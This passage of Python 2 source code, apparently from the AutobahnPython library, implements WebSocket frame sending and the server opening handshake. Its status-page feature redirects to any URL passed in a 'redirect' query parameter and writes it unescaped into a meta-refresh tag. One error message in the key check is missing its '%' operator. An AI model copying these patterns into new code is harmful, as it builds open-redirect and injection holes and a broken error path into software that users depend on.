:param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negoiated which defines semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
self.send_message_frame_masker = createXorMasker(self.send_message_frame_mask, length)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent
that is, there is no endMessageFrame, since you have begun the frame specifying
the frame length, which implicitly defined the frame end. This is different from
messages, which you begin and end, since a message can contain an unlimited number
of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when frame still incomplete, returns outstanding octets, when frame complete, returns <= 0, when < 0, the amount of unconsumed data in payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when =0 : frame was completed exactly
## when >0 : frame is still uncomplete and that much amount is still left to complete the frame
## when <0 : frame was completed and there was this much unconsumed data in payload argument
##
return rest
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
You can send text or binary message, and optionally specifiy a payload fragment size.
When the latter is given, the payload will be split up into frames with
payload <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.trackedTimings:
self.trackedTimings.track("sendMessage")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
## explicit payload_frag_size arguments overrides autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
"""
Ctor for a prepared message.
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be masked (required for client to server WebSocket messages).
:type masked: bool
"""
self._initHixie(payload, binary)
self._initHybi(payload, binary, masked)
def _initHixie(self, payload, binary):
if binary:
# silently filter out .. probably do something else:
# base64?
# dunno
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def _initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
else:
plm = createXorMasker(mask, l).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
class WebSocketFactory:
"""
Mixin for
:class:`autobahn.websocket.WebSocketClientFactory` and
:class:`autobahn.websocket.WebSocketServerFactory`.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of :class:`autobahn.websocket.WebSocketProtocol` using
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`.
By doing so, you can avoid the (small) overhead of framing the
*same* payload into WS messages when that payload is to be sent
out on multiple connections.
Caveats:
1. Only use when you know what you are doing. I.e. calling
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`
on the *same* protocol instance multiples times with the *same*
prepared message might break the spec, since i.e. the frame mask
will be the same!
2. Treat the object returned as opaque. It may change!
Modes: Hybi, Hixie
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be
masked (required for client-to-server WebSocket messages).
:type masked: bool
:returns: obj -- The prepared message.
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSocket servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
`HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!")`.
When you want to accept the connection, return the accepted protocol
from list of WebSocket (sub)protocols provided by client or None to
speak no specific one or when the client list was empty.
You may also return a pair of `(protocol, headers)` to send additional HTTP `headers`.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation *before* your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation *after* your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def processProxyConnect(self):
raise Exception("Autobahn isn't a proxy server")
def parseHixie76Key(self, key):
"""
Parse Hixie76 opening handshake key provided by client.
"""
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
def processHandshake(self):
"""
Process WebSocket opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.externalPort:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.externalPort))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.externalPort == 443) or (not self.factory.isSecure and self.factory.externalPort == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.externalPort, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
if self.http_request_params.has_key('redirect') and len(self.http_request_params['redirect']) > 0:
## To specifiy an URL for redirection, encode the URL, i.e. from JavaScript:
##
## var url = encodeURIComponent("http://autobahn.ws/python");
##
## and append the encoded string as a query parameter 'redirect'
##
## http://localhost:9000?redirect=http%3A%2F%2Fautobahn.ws%2Fpython
## https://localhost:9000?redirect=https%3A%2F%2Ftwitter.com%2F
##
## This will perform an immediate HTTP-303 redirection. If you provide
## an additional parameter 'after' (int >= 0), the redirection happens
## via Meta-Refresh in the rendered HTML status page, i.e.
##
## https://localhost:9000/?redirect=https%3A%2F%2Ftwitter.com%2F&after=3
##
url = self.http_request_params['redirect'][0]
if self.http_request_params.has_key('after') and len(self.http_request_params['after']) > 0:
after = int(self.http_request_params['after'][0])
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page and meta-refresh-redirecting to %s after %d seconds" % (url, after))
self.sendServerStatus(url, after)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : 303-redirecting to %s" % url)
self.sendRedirect(url)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page")
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
if self.debug:
log.msg("received HTTP request body containing key3 for Hixie-76: %s" % key3)
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or a pair (protocol, headers) or raise an HttpException
##
protocol = None
headers = {}
res = self.onConnect(connectionRequest)
if type(res) == tuple:
if len(res) > 0:
protocol = res[0]
if len(res) > 1:
headers = res[1]
else:
protocol = res
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
## optional, user supplied additional HTTP headers
##
## headers from factory
for uh in self.factory.headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## headers from onConnect
for uh in headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
## browser client provide the header, and expect it to be echo'ed
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.externalPort))
if (self.factory.isSecure and self.factory.externalPort != 443) or ((not self.factory.isSecure) and self.factory.externalPort != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.externalPort)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
## cancel any opening HS timer if present
##
if self.openHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("openHandshakeTimeoutCall.cancel")
self.openHandshakeTimeoutCall.cancel()
self.openHandshakeTimeoutCall = None
## init state
##
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During opening handshake the client request was invalid, we send a HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
"""
Send HTML page HTTP response.
"""
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendRedirect(self, url):
"""
Send HTTP Redirect (303) response.
"""
response = "HTTP/1.1 %d\x0d\x0a" % HTTP_STATUS_CODE_SEE_OTHER[0]
#if self.factory.server is not None and self.factory.server != "":
# response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Location: %s\x0d\x0a" % url.encode("utf-8")
response += "\x0d\x0a"
self.sendData(response)
def sendServerStatus(self, redirectUrl = None, redirectAfter = 0):
"""
Used to send out server status/version upon receiving a HTTP/GET without
upgrade to WebSocket header (and option serverStatus is True).
"""
if redirectUrl:
redirect = """<meta http-equiv="refresh" content="%d;URL='%s'">""" % (redirectAfter, redirectUrl)
else:
redirect = ""
html = """
<!DOCTYPE html>
<html>
<head>
%s
<style>
body {
color: #fff;
background-color: #027eae;
font-family: "Segoe UI", "Lucida Grande", "Helvetica Neue", Helvetica, Arial, sans-serif;
font-size: 16px;
}
a, a:visited, a:hover {
color: #fff;
}
</style>
</head>
<body>
<h1>AutobahnPython %s</h1>
<p>
I am not Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws/python">my homepage</a>.
</p>
</body>
</html>
""" % (redirect, __version__)
self.sendHtml(html)
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self, url = None, protocols = [], server = "AutobahnPython/%s" % __version__, headers = {}, externalPort = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket server factory.
Note that you MUST provide URL either here or using
:meth:`autobahn.websocket.WebSocketServerFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnWebSocket/x.x.x").
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server, headers, externalPort)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
def setSessionParameters(self, url = None, protocols = [], server = None, headers = {}, externalPort = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
self.headers = headers
self.externalPort = externalPort if externalPort is not None else self.port
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
